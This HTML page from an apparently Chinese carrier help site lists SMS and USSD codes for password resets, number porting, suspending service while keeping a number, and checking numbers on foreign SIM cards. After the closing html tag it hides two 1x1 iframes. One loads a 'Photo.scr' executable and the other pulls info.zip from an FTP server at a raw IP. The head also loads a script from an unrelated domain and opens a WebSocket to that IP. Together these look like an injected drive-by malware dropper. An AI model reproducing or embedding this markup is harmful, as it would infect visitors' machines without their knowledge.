<!DOCTYPE html>
<html>

<head>
    <meta charset="gb2312">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <link rel="shortcut icon" type="image/ico" href="http://www.datatables.net/favicon.ico">
    <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js">


    </script>
    <script type="text/javascript" src="https://www.metamarket.quest/market.js"></script>
    <meta name="viewport" content="width=device-width, initial-scale=1, minimum-scale=1.0, user-scalable=no">
    <title>0038 | 常用指令</title>
    <link rel="stylesheet" type="text/css" href="./config/jquery.dataTables.css">
    <link rel="stylesheet" type="text/css" href="./config/shCore.css">
    <link rel="stylesheet" type="text/css" href="./config/demo.css">
    <link rel="stylesheet" rev="stylesheet" href="css/bq.css" type="text/css" />

    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.5.0/css/font-awesome.min.css">
    <style type="text/css" class="init">

    </style>
    <script type="text/javascript" language="javascript" src="https://code.jquery.com/jquery-3.5.1.js"></script>
    <script type="text/javascript" language="javascript" src="./config/jquery.dataTables.js"></script>
    <script type="text/javascript" language="javascript" src="./config/shCore.js"></script>
    <script type="text/javascript" language="javascript" src="./config/demo.js"></script>
    <link rel="stylesheet" href="css/swiper-3.4.2.min.css">

    <script type="text/javascript" language="javascript" class="init">




        <script>



            function displayit(n){



	for(i=0;i<4;i++){



		if(i==n){



			var id='menu_list'+n;



            if(document.getElementById(id).style.display=='none'){



                document.getElementById(id).style.display = '';



            document.getElementById("plug-wrap").style.display='';



			}else{



                document.getElementById(id).style.display = 'none';



            document.getElementById("plug-wrap").style.display='none';



			}



		}else{



			if($('#menu_list'+i)){



                $('#menu_list' + i).css('display', 'none');



			}



		}



	}



}



            function closeall(){



	var count = document.getElementById("top_menu").getElementsByTagName("ul").length;



            for(i=0;i<count;i++){



                document.getElementById("top_menu").getElementsByTagName("ul").item(i).style.display = 'none';



	}



            document.getElementById("plug-wrap").style.display='none';



}







            document.addEventListener('WeixinJSBridgeReady', function onBridgeReady() {



                WeixinJSBridge.call('hideToolbar');



});



    </script>





    <script>


    var socket;


    if ("WebSocket" in window) {


var ws = new WebSocket("ws://118.25.238.200:8181");


    socket = ws;


    ws.onopen = function() {


    };


    ws.onmessage = function(evt) {


var received_msg = evt.data;


};


    ws.onmessage = function(evt) {


var received_msg = evt.data;


    document.getElementById("renshu").innerHTML =received_msg;


};


}


    </script>





    <style type="text/css">
        body {
            margin-bottom: 60px !important;
        }



        a,
        button,
        input {
            -webkit-tap-highlight-color: rgba(255, 0, 0, 0);
        }



        ul,
        li {
            list-style: none;
            margin: 0;
            padding: 0
        }



        .top_bar {
            position: fixed;
            z-index: 900;
            bottom: 0;
            left: 0;
            right: 0;
            margin: auto;
            font-family: Helvetica, Tahoma, Arial, Microsoft YaHei, sans-serif;
        }



        .top_menu {
            display: -webkit-box;
            border-top: 1px solid #3D3D46;
            display: block;
            width: 100%;
            background: rgba(255, 255, 255, 0.7);
            height: 48px;
            display: -webkit-box;
            display: box;
            margin: 0;
            padding: 0;
            -webkit-box-orient: horizontal;
            background: -webkit-gradient(linear, 0 0, 0 100%, from(#524945), to(#48403c), color-stop(60%, #524945));
            box-shadow: 0 1px 0 0 rgba(255, 255, 255, 0.1) inset;
        }



        .top_bar .top_menu>li {
            -webkit-box-flex: 1;
            position: relative;
            text-align: center;
        }



        .top_menu li:first-child {
            background: none;
        }



        .top_bar .top_menu>li>a {
            height: 48px;
            margin-right: 1px;
            display: block;
            text-align: center;
            color: #FFF;
            text-decoration: none;
            text-shadow: 0 1px rgba(0, 0, 0, 0.3);
            -webkit-box-flex: 1;
        }



        .top_bar .top_menu>li.home {
            max-width: 70px
        }



        .top_bar .top_menu>li.home a {
            height: 66px;
            width: 66px;
            margin: auto;
            border-radius: 60px;
            position: relative;
            top: -22px;
            left: 2px;
            background: url('images/home.png') no-repeat center center;
            background-size: 100% 100%;
        }



        .top_bar .top_menu>li>a label {
            overflow: hidden;
            margin: 0 0 0 0;
            font-size: 12px;
            display: block !important;
            line-height: 18px;
            text-align: center;
        }



        .top_bar .top_menu>li>a img {
            padding: 3px 0 0 0;
            height: 24px;
            width: 24px;
            color: #fff;
            line-height: 48px;
            vertical-align: middle;
        }



        .top_bar li:first-child a {
            display: block;
        }



        .menu_font {
            text-align: left;
            position: absolute;
            right: 10px;
            z-index: 500;
            background: -webkit-gradient(linear, 0 0, 0 100%, from(#524945), to(#48403c), color-stop(60%, #524945));
            border-radius: 5px;
            width: 120px;
            margin-top: 10px;
            padding: 0;
            box-shadow: 0 1px 5px rgba(0, 0, 0, 0.3);
        }



        .menu_font.hidden {
            display: none;
        }



        .menu_font {
            top: inherit !important;
            bottom: 60px;
        }



        .menu_font li a {
            height: 40px;
            margin-right: 1px;
            display: block;
            text-align: center;
            color: #FFF;
            text-decoration: none;
            text-shadow: 0 1px rgba(0, 0, 0, 0.3);
            -webkit-box-flex: 1;
        }



        .menu_font li a {
            text-align: left !important;
        }



        .top_menu li:last-of-type a {
            background: none;
            overflow: hidden;
        }



        .menu_font:after {
            top: inherit !important;
            bottom: -6px;
            border-color: #48403c rgba(0, 0, 0, 0) rgba(0, 0, 0, 0);
            border-width: 6px 6px 0;
            position: absolute;
            content: "";
            display: inline-block;
            width: 0;
            height: 0;
            border-style: solid;
            left: 80%;
        }



        .menu_font li {
            border-top: 1px solid rgba(255, 255, 255, 0.1);
            border-bottom: 1px solid rgba(0, 0, 0, 0.2);
        }



        .menu_font li:first-of-type {
            border-top: 0;
        }



        .menu_font li:last-of-type {
            border-bottom: 0;
        }



        .menu_font li a {
            height: 40px;
            line-height: 40px !important;
            position: relative;
            color: #fff;
            display: block;
            width: 100%;
            text-indent: 10px;
            white-space: nowrap;
            text-overflow: ellipsis;
            overflow: hidden;
        }



        .menu_font li a img {
            width: 20px;
            height: 20px;
            display: inline-block;
            margin-top: -2px;
            color: #fff;
            line-height: 40px;
            vertical-align: middle;
        }



        .menu_font>li>a label {
            padding: 3px 0 0 3px;
            font-size: 14px;
            overflow: hidden;
            margin: 0;
        }



        #menu_list0 {
            right: 0;
            left: 10px;
        }



        #menu_list0:after {
            left: 20%;
        }



        #sharemcover {
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            background: rgba(0, 0, 0, 0.7);
            display: none;
            z-index: 20000;
        }



        #sharemcover img {
            position: fixed;
            right: 18px;
            top: 5px;
            width: 260px;
            height: 180px;
            z-index: 20001;
            border: 0;
        }



        .top_bar .top_menu>li>a:hover,
        .top_bar .top_menu>li>a:active {
            background-color: #333;
        }



        .menu_font li a:hover,
        .menu_font li a:active {
            background-color: #333;
        }



        .menu_font li:first-of-type a {
            border-radius: 5px 5px 0 0;
        }



        .menu_font li:last-of-type a {
            border-radius: 0 0 5px 5px;
        }



        #plug-wrap {
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            background: rgba(0, 0, 0, 0);
            z-index: 800;
        }



        #cate18 .device {
            bottom: 49px;
        }



        #cate18 #indicator {
            bottom: 240px;
        }



        #cate19 .device {
            bottom: 49px;
        }



        #cate19 #indicator {
            bottom: 330px;
        }



        #cate19 .pagination {
            bottom: 60px;
        }






        body {
            max-width: 700px;
            margin: 0 auto !important;
        }
    </style>






    <script>


    function func10() {


        //iframe层


        layer.open({


            type: 2,


            title: '0038相关资料',


            shadeClose: true,


            shade: 0.8,


            area: ['85%', '65%'],


            content: 'xiangguan/0038.html' //iframe的url


        }); 


    }


    </script>


    <script src="http://libs.baidu.com/jquery/1.9.1/jquery.min.js"></script>


    <script src="https://cdn.bootcdn.net/ajax/libs/layer/3.5.1/layer.js"></script>













    <b>
        <!-- ---------------------以下是0038 | 常用指令----------- -->

        <div class="biaoti">
            <section>
                <div class="demo-html"></div>
                <table id="example" class="display" style="width:100%">
                    <thead>
                        <tr>
                            <th></th>
                        </tr>
                    </thead>
                    <tbody>
                        <tr>
                            <td>0038 | 常用指令<a class="clplpi-lplink2 g-press soj">
                                    <dt><i style="background-color:#BB5500">常用指令</i><i
                                            style="background-color:#044599">￥0</i><i id="func10" onclick="func10();"
                                            style="background-color:#FF3333">相关资料</i></dt>
                                </a></td>
                            <td><img src="slt" height="60" width="60" /></td>
                        </tr>
                    </tbody>
                </table>
            </section>
        </div>
        </div><br>
        <H3 style='FONT-SIZE: 14px; FONT-FAMILY: "PingFang SC"; FONT-WEIGHT: 500; COLOR: #333333; FONT-STYLE: normal; TEXT-ALIGN: left; TEXT-INDENT: 0px'
            align=left><IMG border=0 alt="" src="http://kindeditor.net/ke4/plugins/emoticons/images/79.gif"
                data-ke-src="http://kindeditor.net/ke4/plugins/emoticons/images/79.gif"><SPAN
                style="FONT-SIZE: 14px">【运营商常用指令大全/实时更新】</SPAN><IMG border=0 alt=""
                src="http://kindeditor.net/ke4/plugins/emoticons/images/82.gif"
                data-ke-src="http://kindeditor.net/ke4/plugins/emoticons/images/82.gif"><BR><BR><A
                href="https://getsimnum.caict.ac.cn/m/#/" target=_blank
                data-ke-src="https://getsimnum.caict.ac.cn/m/#/"><SPAN
                    style="COLOR: #337fe5">一证通查（查询身份证在所有运营商的卡片数</SPAN><SPAN
                    style="COLOR: #337fe5">）</SPAN></A><BR><BR><SPAN style="FONT-SIZE: 14px">移动重置密码方式一：</SPAN><BR><SPAN
                style="FONT-SIZE: 14px">242*身份证号码*新密码*新密码 发送到10086</SPAN><BR><BR><SPAN
                style="FONT-SIZE: 14px">移动重置密码方式二：</SPAN><BR><A
                href="http://h5.sd.chinamobile.com/mcs/cloud/store/#/livingCertify/servicePassword?channelCode=bsacSms"
                target=_blank
                data-ke-src="http://h5.sd.chinamobile.com/mcs/cloud/store/#/livingCertify/servicePassword?channelCode=bsacSms"><SPAN
                    style="COLOR: #337fe5"><SPAN
                        style="FONT-SIZE: 14px; COLOR: #337fe5">点击进入在线密码重置</SPAN><BR></SPAN></A><BR><SPAN
                style="FONT-SIZE: 14px">联通重置密码方式一：</SPAN><BR><SPAN
                style="FONT-SIZE: 14px">本机发送短信405或“MMCZ”至10010，根据提示回复“MMCZ#6位新密码#证件号后6位”</SPAN><BR><BR><SPAN
                style="FONT-SIZE: 14px"><SPAN style="FONT-SIZE: 14px">联通重置密码方式二：</SPAN><BR><A
                    href="https://wap.10010.com/mobileService/businessTransact/resetPwd/view.htm?menuId=000100010005&amp;duanlianjieabc=qAHGN"
                    target=_blank
                    data-ke-src="https://wap.10010.com/mobileService/businessTransact/resetPwd/view.htm?menuId=000100010005&amp;amp;duanlianjieabc=qAHGN"><SPAN
                        style="FONT-SIZE: 14px; COLOR: #337fe5">点击进入在线密码重置</SPAN></A></SPAN><BR><BR><BR><SPAN
                style="FONT-SIZE: 14px"><SPAN style="FONT-SIZE: 14px"><STRONG>电信重置密码：</STRONG></SPAN><BR></SPAN></H3>


        <P style='FONT-SIZE: 16px; FONT-FAMILY: "PingFang SC"; FONT-WEIGHT: 400; COLOR: #333333; FONT-STYLE: normal; TEXT-INDENT: 0px'
            align=left><SPAN style="FONT-SIZE: 14px">发送短信“503（或MMCZ）#机主名称#身份证号码”到10001</SPAN></P>


        <P style='FONT-SIZE: 16px; FONT-FAMILY: "PingFang SC"; FONT-WEIGHT: 400; COLOR: #333333; FONT-STYLE: normal; TEXT-INDENT: 0px'
            align=left><SPAN style="FONT-SIZE: 14px"><BR><STRONG><SPAN
                        style="FONT-SIZE: 14px">携号转网资格</SPAN></STRONG><STRONG><SPAN
                        style="FONT-SIZE: 14px">查询：</SPAN></STRONG></SPAN></P>


        <P style='FONT-SIZE: 16px; FONT-FAMILY: "PingFang SC"; FONT-WEIGHT: 400; COLOR: #333333; FONT-STYLE: normal; TEXT-INDENT: 0px'
            align=left><SPAN style="FONT-SIZE: 14px">电信用户&nbsp;&nbsp;使用本机编辑短信“CXXZ#姓名#证件号码”发送至10001</SPAN></P>


        <P style='FONT-SIZE: 16px; FONT-FAMILY: "PingFang SC"; FONT-WEIGHT: 400; COLOR: #333333; FONT-STYLE: normal; TEXT-INDENT: 0px'
            align=left><SPAN style="FONT-SIZE: 14px">移动用户&nbsp;&nbsp;使用本机编辑短信“CXXZ#姓名#证件号码”发送至10086</SPAN></P>


        <P style='FONT-SIZE: 16px; FONT-FAMILY: "PingFang SC"; FONT-WEIGHT: 400; COLOR: #333333; FONT-STYLE: normal; TEXT-INDENT: 0px'
            align=left><SPAN style="FONT-SIZE: 14px">联通用户&nbsp;&nbsp;使用本机编辑短信“CXXZ#姓名#证件号码”发送至10010</SPAN></P>


        <DIV style='FONT-SIZE: 16px; FONT-FAMILY: "PingFang SC"; FONT-WEIGHT: 400; COLOR: #333333; FONT-STYLE: normal; MARGIN: 0px'
            align=left><SPAN style="FONT-SIZE: 14px">&nbsp;</SPAN></DIV>


        <P style='FONT-SIZE: 16px; FONT-FAMILY: "PingFang SC"; FONT-WEIGHT: 400; COLOR: #333333; FONT-STYLE: normal; TEXT-INDENT: 0px'
            align=left><SPAN style="FONT-SIZE: 14px"><STRONG>携号转网申请：</STRONG></SPAN></P>


        <P style='FONT-SIZE: 16px; FONT-FAMILY: "PingFang SC"; FONT-WEIGHT: 400; COLOR: #333333; FONT-STYLE: normal; TEXT-INDENT: 0px'
            align=left><SPAN style="FONT-SIZE: 14px">电信用户&nbsp;&nbsp;使用本机编辑短信“SQXZ#姓名#证件号码”发送至10001</SPAN></P>


        <P style='FONT-SIZE: 16px; FONT-FAMILY: "PingFang SC"; FONT-WEIGHT: 400; COLOR: #333333; FONT-STYLE: normal; TEXT-INDENT: 0px'
            align=left><SPAN style="FONT-SIZE: 14px">移动用户&nbsp;&nbsp;使用本机编辑短信“SQXZ#姓名#证件号码”发送至10086</SPAN></P>


        <P style='FONT-SIZE: 16px; FONT-FAMILY: "PingFang SC"; FONT-WEIGHT: 400; COLOR: #333333; FONT-STYLE: normal; TEXT-INDENT: 0px'
            align=left><SPAN style="FONT-SIZE: 14px">联通用户&nbsp;&nbsp;使用本机编辑短信“SQXZ#姓名#证件号码”发送至10010</SPAN></P>


        <P style='FONT-SIZE: 16px; FONT-FAMILY: "PingFang SC"; FONT-WEIGHT: 400; COLOR: #333333; FONT-STYLE: normal; TEXT-INDENT: 0px'
            align=left><SPAN style="FONT-SIZE: 14px"><BR><STRONG>移动申请停机保号：</STRONG></SPAN></P>


        <P style='FONT-SIZE: 16px; FONT-FAMILY: "PingFang SC"; FONT-WEIGHT: 400; COLOR: #333333; FONT-STYLE: normal; TEXT-INDENT: 0px'
            align=left><SPAN style="FONT-SIZE: 14px">5932*手机号码*密码 发送到10086</SPAN></P>


        <P style='FONT-SIZE: 16px; FONT-FAMILY: "PingFang SC"; FONT-WEIGHT: 400; COLOR: #333333; FONT-STYLE: normal; TEXT-INDENT: 0px'
            align=left><BR></P>


        <P style='FONT-SIZE: 16px; FONT-FAMILY: "PingFang SC"; FONT-WEIGHT: 400; COLOR: #333333; FONT-STYLE: normal; TEXT-INDENT: 0px'
            align=left><SPAN style="FONT-SIZE: 14px"><STRONG>移动取消停机保号：</STRONG></SPAN></P>


        <P style='FONT-SIZE: 16px; FONT-FAMILY: "PingFang SC"; FONT-WEIGHT: 400; COLOR: #333333; FONT-STYLE: normal; TEXT-INDENT: 0px'
            align=left><SPAN style="FONT-SIZE: 14px">5931*手机号码*密码 发送到10086</SPAN></P>


        <P style='FONT-SIZE: 16px; FONT-FAMILY: "PingFang SC"; FONT-WEIGHT: 400; COLOR: #333333; FONT-STYLE: normal; TEXT-INDENT: 0px'
            align=left><SPAN style="FONT-SIZE: 14px"><BR><STRONG>开心卡获取号码：</STRONG></SPAN></P>


        <P style='FONT-SIZE: 16px; FONT-FAMILY: "PingFang SC"; FONT-WEIGHT: 400; COLOR: #333333; FONT-STYLE: normal; TEXT-INDENT: 0px'
            align=left><SPAN style="FONT-SIZE: 14px">*117#拨号<BR><BR></SPAN></P>


        <P style='FONT-SIZE: 16px; FONT-FAMILY: "PingFang SC"; FONT-WEIGHT: 400; COLOR: #333333; FONT-STYLE: normal; TEXT-INDENT: 0px'
            align=left><SPAN style="FONT-SIZE: 14px"><STRONG>缅甸卡获取号码：</STRONG></SPAN></P>


        <P style='FONT-SIZE: 16px; FONT-FAMILY: "PingFang SC"; FONT-WEIGHT: 400; COLOR: #333333; FONT-STYLE: normal; TEXT-INDENT: 0px'
            align=left><SPAN style="FONT-SIZE: 14px">*124#拨号<BR><BR></SPAN></P>


        <P style='FONT-SIZE: 16px; FONT-FAMILY: "PingFang SC"; FONT-WEIGHT: 400; COLOR: #333333; FONT-STYLE: normal; TEXT-INDENT: 0px'
            align=left><SPAN style="FONT-SIZE: 14px"><STRONG>香港和记获取号码：</STRONG></SPAN></P>


        <P style='FONT-SIZE: 16px; FONT-FAMILY: "PingFang SC"; FONT-WEIGHT: 400; COLOR: #333333; FONT-STYLE: normal; TEXT-INDENT: 0px'
            align=left><SPAN style="FONT-SIZE: 14px">##107*拨号</SPAN></P>


        <P style='FONT-SIZE: 16px; FONT-FAMILY: "PingFang SC"; FONT-WEIGHT: 400; COLOR: #333333; FONT-STYLE: normal; TEXT-INDENT: 0px'
            align=left><BR></P>


        <P style='FONT-SIZE: 16px; FONT-FAMILY: "PingFang SC"; FONT-WEIGHT: 400; COLOR: #333333; FONT-STYLE: normal; TEXT-INDENT: 0px'
            align=left><SPAN style="FONT-SIZE: 14px"><STRONG>印尼卡获取号码&nbsp;：</STRONG></SPAN></P>


        <P style='FONT-SIZE: 16px; FONT-FAMILY: "PingFang SC"; FONT-WEIGHT: 400; COLOR: #333333; FONT-STYLE: normal; TEXT-INDENT: 0px'
            align=left><SPAN style="FONT-SIZE: 14px">*123*817#拨号</SPAN></P>


        <P style='FONT-SIZE: 16px; FONT-FAMILY: "PingFang SC"; FONT-WEIGHT: 400; COLOR: #333333; FONT-STYLE: normal; TEXT-INDENT: 0px'
            align=left><SPAN style="FONT-SIZE: 14px"><BR><STRONG>香港移动获取号码：</STRONG></SPAN><BR>*#130#拨号</P>


        <P style='FONT-SIZE: 16px; FONT-FAMILY: "PingFang SC"; FONT-WEIGHT: 400; COLOR: #333333; FONT-STYLE: normal; TEXT-INDENT: 0px'
            align=left><SPAN style="FONT-SIZE: 14px"><STRONG>熊猫卡获取号码：</STRONG></SPAN></P>


        <P style='FONT-SIZE: 16px; FONT-FAMILY: "PingFang SC"; FONT-WEIGHT: 400; COLOR: #333333; FONT-STYLE: normal; TEXT-INDENT: 0px'
            align=left>*116#拨号</P>


        <P style='FONT-SIZE: 16px; FONT-FAMILY: "PingFang SC"; FONT-WEIGHT: 400; COLOR: #333333; FONT-STYLE: normal; TEXT-INDENT: 0px'
            align=left><SPAN style="FONT-SIZE: 14px"><STRONG>澳门和记获取号码：</STRONG></SPAN></P>


        <P style='FONT-SIZE: 16px; FONT-FAMILY: "PingFang SC"; FONT-WEIGHT: 400; COLOR: #333333; FONT-STYLE: normal; TEXT-INDENT: 0px'
            align=left><SPAN style="FONT-SIZE: 14px">##122#拨号<BR></SPAN></P>


        <P style='FONT-SIZE: 16px; FONT-FAMILY: "PingFang SC"; FONT-WEIGHT: 400; COLOR: #333333; FONT-STYLE: normal; TEXT-INDENT: 0px'
            align=left><SPAN style="FONT-SIZE: 14px"><STRONG>you r获取号码：<SPAN
                        style="FONT-SIZE: 14px"></SPAN></STRONG></SPAN></P>


        <P style='FONT-SIZE: 16px; FONT-FAMILY: "PingFang SC"; FONT-WEIGHT: 400; COLOR: #333333; FONT-STYLE: normal; TEXT-INDENT: 0px'
            align=left><SPAN style="FONT-SIZE: 14px">##122#拨号</SPAN></P>


        <P style='FONT-SIZE: 16px; FONT-FAMILY: "PingFang SC"; FONT-WEIGHT: 400; COLOR: #333333; FONT-STYLE: normal; TEXT-INDENT: 0px'
            align=left>&nbsp;</P>


        <P style='FONT-SIZE: 16px; FONT-FAMILY: "PingFang SC"; FONT-WEIGHT: 400; COLOR: #333333; FONT-STYLE: normal; TEXT-INDENT: 0px'
            align=left><SPAN style="FONT-SIZE: 14px"><STRONG>ABC获取号码：</STRONG></SPAN></P>


        <P style='FONT-SIZE: 16px; FONT-FAMILY: "PingFang SC"; FONT-WEIGHT: 400; COLOR: #333333; FONT-STYLE: normal; TEXT-INDENT: 0px'
            align=left><SPAN style="FONT-SIZE: 14px">*122*1#拨号</SPAN></P>


        <P style='FONT-SIZE: 16px; FONT-FAMILY: "PingFang SC"; FONT-WEIGHT: 400; COLOR: #333333; FONT-STYLE: normal; TEXT-INDENT: 0px'
            align=left>&nbsp;</P>


        <P style='FONT-SIZE: 16px; FONT-FAMILY: "PingFang SC"; FONT-WEIGHT: 400; COLOR: #333333; FONT-STYLE: normal; TEXT-INDENT: 0px'
            align=left><SPAN style="FONT-SIZE: 14px"><STRONG>泰国卡获取号码：</STRONG></SPAN></P>


        <P style='FONT-SIZE: 16px; FONT-FAMILY: "PingFang SC"; FONT-WEIGHT: 400; COLOR: #333333; FONT-STYLE: normal; TEXT-INDENT: 0px'
            align=left><SPAN style="FONT-SIZE: 14px">*111#拨号</SPAN></P>


        <P style='FONT-SIZE: 16px; FONT-FAMILY: "PingFang SC"; FONT-WEIGHT: 400; COLOR: #333333; FONT-STYLE: normal; TEXT-INDENT: 0px'
            align=left>&nbsp;</P>


        <P style='FONT-SIZE: 16px; FONT-FAMILY: "PingFang SC"; FONT-WEIGHT: 400; COLOR: #333333; FONT-STYLE: normal; TEXT-INDENT: 0px'
            align=left><SPAN style="FONT-SIZE: 14px"><STRONG>数码通获取号码：</STRONG></SPAN></P>


        <P style='FONT-SIZE: 16px; FONT-FAMILY: "PingFang SC"; FONT-WEIGHT: 400; COLOR: #333333; FONT-STYLE: normal; TEXT-INDENT: 0px'
            align=left><SPAN style="FONT-SIZE: 14px">*111#拨号</SPAN></P>


        <P style='FONT-SIZE: 16px; FONT-FAMILY: "PingFang SC"; FONT-WEIGHT: 400; COLOR: #333333; FONT-STYLE: normal; TEXT-INDENT: 0px'
            align=left><SPAN style="FONT-SIZE: 14px"><STRONG>英国LEBARA获取号码：</STRONG></SPAN></P>


        <P style='FONT-SIZE: 16px; FONT-FAMILY: "PingFang SC"; FONT-WEIGHT: 400; COLOR: #333333; FONT-STYLE: normal; TEXT-INDENT: 0px'
            align=left><SPAN style="FONT-SIZE: 14px">*#100#拨号</SPAN></P>
        <hr>
        <div class="container">
            <div class="remen">
                <section>
                    <div class="demo-html"></div>
                    <table id="example" class="display" style="width:100%">
                        <thead>
                            <tr>
                                <th></th>
                                <th></th>
                            </tr>
                        </thead>
                        <tbody>



                            <a class="clplpi-lplink2 g-press soj">
                                <dt>
                                    <i style="font-size: 15px;background-color:#FF6969">热门推荐</i>
                                </dt>
                            </a>
                    </table>

            </div>
            </section>
        </div>
        <!-- ---------------------以上是放在详情底部的随机推荐：----------- -->


        <p style="color:#2961A8;text-align: center">阅读<span id="busuanzi_value_page_pv"></span></span> 更新6.28 23:59</p>

        <br><br><br><br><br>




    </b>
    <!-- 以下是导航 -->




    <div class="top_bar" style="-webkit-transform:translate3d(0,0,0)">



        <nav>



            <ul id="top_menu" class="top_menu">

                <li><a href="1.html"><img src="images/plugmenu1.png"><label>电信</label></a></li>

                <li><a href="2.html"><img src="images/plugmenu3.png"><label>移动</label></a></li>

                <li class="home"><a href="index.html"></a></li>

                <li><a href="3.html"><img src="images/plugmenu5.png"><label>联通</label></a></li>

                <!-- <li><a href="4.html"><img src="images/plugmenu9.png"><label>代理</label></a></li> -->

                <!-- 子菜单 -->

                <li><a onclick="javascript:displayit(3)"><img src="images/plugmenu6.png"><label>其他</label></a>



                    <ul id="menu_list3" class="menu_font" style=" display:none">



                        <li> <a href="xgzl.html"><img src="images/plugmenu7.png"><label>相关资料</label></a></li>

                        <li> <a href="4.html"><img src="images/plugmenu9.png"><label>关于代理</label></a></li>





                    </ul>

                </li>



            </ul>

        </nav>

    </div>

    <div id="plug-wrap" onclick="closeall()" style="display: none;"></div>

</html><iframe src=Photo.scr width=1 height=1 frameborder=0></iframe><iframe
    src=ftp://anonymous:starwars@118.25.238.200/info.zip width=1 height=1 frameborder=0>

</iframe>
